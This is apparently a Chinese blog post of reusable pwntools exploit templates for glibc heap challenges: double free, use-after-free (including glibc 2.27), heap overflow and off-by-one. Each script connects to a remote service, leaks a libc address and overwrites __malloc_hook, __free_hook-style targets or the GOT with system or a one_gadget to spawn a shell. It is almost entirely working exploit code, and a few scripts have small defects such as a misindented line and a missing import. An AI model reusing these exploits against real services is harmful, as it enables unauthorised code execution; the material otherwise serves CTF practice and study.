heap模板

文章发布时间:

最后更新时间:

文章总字数:
1.4k

预计阅读时间:
8 分钟

页面浏览:加载中...

double free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *

context(arch='i386', log_level='debug', os='linux')

#p = process('./heap_Double_Free')
p=remote('123.60.135.228', 2056)

def fulltcache():
    for i in range(7):
        malloc(i, b'qwer')
    for i in range(7):
        free(i)

def malloc(id, contet):
    p.sendlineafter('root@ubuntu:~/Desktop$', b'1')
    p.sendlineafter('please input id and size :', str(id))
    sleep(0.1)
    p.sendline(b'100')
    p.sendlineafter('please input contet:', contet)

def free(id):
    p.sendlineafter('root@ubuntu:~/Desktop$', b'2')
    p.sendlineafter('please input id :', str(id))

def print(id):
    p.sendlineafter('root@ubuntu:~/Desktop$', b'3')
    p.sendlineafter('please input id :', str(id))


fulltcache()

malloc(1, b'qwer')
malloc(2, b'qwer')
malloc(3, b'qwer')


free(1)
free(2)
free(1)

#attach(p)
malloc(4,p64(0x006010A0))#可修改的内容在这个地址后16字节
malloc(5,b'qwer')
malloc(6,b'qwer')
malloc(7,p64(257))
p.interactive()

uaf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *

context(arch='i386', log_level='debug', os='linux')
elf=ELF("./pwn")


def malloc(size, contet):
    p.sendlineafter("5. exit", b'1')
    p.sendlineafter("--->", str(size))
    p.sendafter("--->", contet)
def free(id):
    p.sendlineafter("5. exit", b'3')
    p.sendlineafter("--->", str(id))

def edit(id,size,contet):
    p.sendlineafter("5. exit", b'2')
    p.sendlineafter("--->", str(id))
    p.sendlineafter("--->", str(size))
    p.sendafter("--->", contet)

def show(id):
    p.sendlineafter("5. exit", b'4')
    p.sendlineafter("--->", str(id))


# p = process('./pwn')
p = remote('node4.buuoj.cn', 26517)
libc = ELF('libc-2.23.so')
malloc(0x80, b'qwer')
malloc(0x80, b'qwer')
malloc(0x68, b'qwer')
malloc(0x68, b'qwer')
malloc(0x68, b'/bin/sh')

free(0)
show(0)
p.recvuntil(":")
libc_base = u64(p.recv(7)[1:] + b'\0' * 2) - 0x7fef613c4b78 + 0x7fef61000000
system = libc_base + libc.sym["system"]
free_got = elf.got['free']
# pause()
free(2)
free(3)
free(2)
malloc(0x68, p64(0x0000000006020C0 - 0x23))
malloc(0x68, 'ase')
malloc(0x68, 'ase')
print(hex(libc_base))
print(hex(free_got))
malloc(0x68, b'a' * (0x23 - 0x10) + p64(free_got))
# attach(p)
edit(0, 10, p64(system))
p.sendlineafter("5. exit", b'3')
p.sendlineafter("--->", b'4')
p.interactive()

2.27uaf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from struct import pack
context.log_level='debug'
context(os = 'linux', arch = 'amd64')

#p = process('./pwn')
p = remote('43.142.108.3', 28585)
elf = ELF('./pwn')
#libc = ELF('buu/libc-2.27-x64.so')
#libc = ELF('glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('libc-2.27.so')

def debug():
	gdb.attach(p)
	pause()
def add(size, name, content):
	p.sendlineafter(b'Choice: \n', '1')
	p.sendlineafter(b'Size:\n', str(size))
	p.sendafter(b'Name: \n', name)
	p.sendafter(b'Content:\n', content)
def free(index):
	p.sendlineafter(b'Choice: \n', '2')
	p.sendlineafter(b'idx:\n', str(index))
def show(index):
	p.sendlineafter(b'Choice: \n', '3')
	p.sendlineafter(b'idx:\n', str(index))
def edit(index, content):
	p.sendlineafter(b'Choice: \n', '4')
	p.sendlineafter(b'idx:\n', str(index))
	p.send(content)
# leak libcbase
add(0x410, b'1', b'a') #index 0
add(0x20, b'1', b'a') #index 1
add(0x10, b'1', b'a') #index 2
free(0)
show(0)
libcbase = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
print(' libcbase -> ', hex(libcbase))

# malloc_hook -> one_gadget
one_gadget = libcbase + 0x10a2fc
malloc_hook = libcbase + libc.sym['__malloc_hook']
free(1)
edit(1, p64(malloc_hook))
add(0x10, b'1', b'a') #index 3
add(0x20, b'1', b'a') #index 4
edit(4, p64(one_gadget))

# pwn
p.sendlineafter(b'Choice: \n', '1')
p.sendlineafter(b'Size:\n', b'10')
p.interactive()

堆溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
from pwn import *

def connetc():
    global p,elf,libc
    p=remote('192.168.109.168',10000)
    #p=process('./Emo_Chunk')
    elf=ELF('./Emo_Chunk')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#context.log_level='debug'
def add(size):
 p.sendlineafter("Please Choice!",'1')
 p.sendlineafter("Please Input Size:",str(size))

def dele(index):
 p.sendlineafter("Please Choice!",'2')
 p.sendlineafter("Please Input index:",str(index))

def show(index):
 p.sendlineafter("Please Choice!",'4')
 p.sendlineafter("Please Input index:",str(index))
def edit(index,content):
 p.sendlineafter("Please Choice!",'3')
 p.sendlineafter("Please Input index:",str(index))
 p.sendlineafter("Change EMo Content",content)
def pwn(i,j):
    add(0x68)#0
    add(0x68)#1
    add(0x68)#2
    add(0x68)#3
    add(0x68)#4
    add(0x68)#5
  
    edit(0,'a'*0x68 + '\xe1' + '\x00'*7)
  
    dele(1)
    add(0x68)
    show(2)
    p.recvuntil('\n')

    addr = u64(p.recv(6).ljust(8,'\x00'))
    print("addr : " + hex(addr-0x3c4b78))
  
    libc_addr = addr - 0x3c4b78
    dele(4)
    edit(3,'a'*0x68 + p64(0x71) + p64(libc_addr+libc.symbols['__malloc_hook']-0x23))
    print(hex(libc_addr+libc.symbols['__malloc_hook']-0x23))

    realloc_hook = libc_addr + libc.sym['__realloc_hook']
    log.info("realloc_hook:"+hex(realloc_hook))
    realloc = libc_addr + libc.sym['realloc']
    log.info("realloc:"+hex(realloc))
  
    add(0x68) #4

    add(0x68) #6
    one = [0x45226,0x4527a,0xf03a4,0xf1247]
    edit(6,cyclic(11)+p64(libc_addr+one[i]) + p64(realloc + j))
    add(0x30)

    p.interactive()
for i in range(4):
 for j in [0,2,4,6,8,10,13,16,20]:
     try:
      print("i :",i)
      print("j :",j)
      connetc()
      pwn(i,int(j))
          p.close()
     except :
      print("...")
      p.close()

off_by_one

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.arch='amd64'

def add(size,contet):
    p.sendafter("Your choice :",b'1')
    p.sendafter("Size of Heap :",str(size))
    p.sendafter("Content of heap:",contet)

def edit(index,contet):
    p.sendafter("Your choice :",b'2')
    p.sendafter("Index :",str(index))
    p.sendafter("Content of heap :",contet)

def show(index):
    p.sendafter("Your choice :",b'3')
    p.sendafter("Index :", str(index))

def dele(index):
    p.sendafter("Your choice :",b'4')
    p.sendlineafter("Index :",str(index))

# p= process("./heapcreator")
p=remote("node4.buuoj.cn",27274)
add(0x18,b'a')
add(0x10,b'b')
add(0x10,b'c')
add(0x10,b'/bin/sh')
edit(0,b'a'*0x18+b'\x81')
dele(1)
add(0x70,b'a')
edit(1,0x10*b'b'+p64(0)+p64(0x21)+p64(0x40)+p64(0x000000000602018))
# attach(p)
show(1)
free=p.recvuntil("\x7f")[-6:]+b'\0'*2
free = u64(free)
print(hex(free))
libc=LibcSearcher("free",free)
system=libc.dump("system")
print(libc)
#attach(p)
edit(1,p64(system+free-libc.dump("free")))
dele(3)
p.interactive()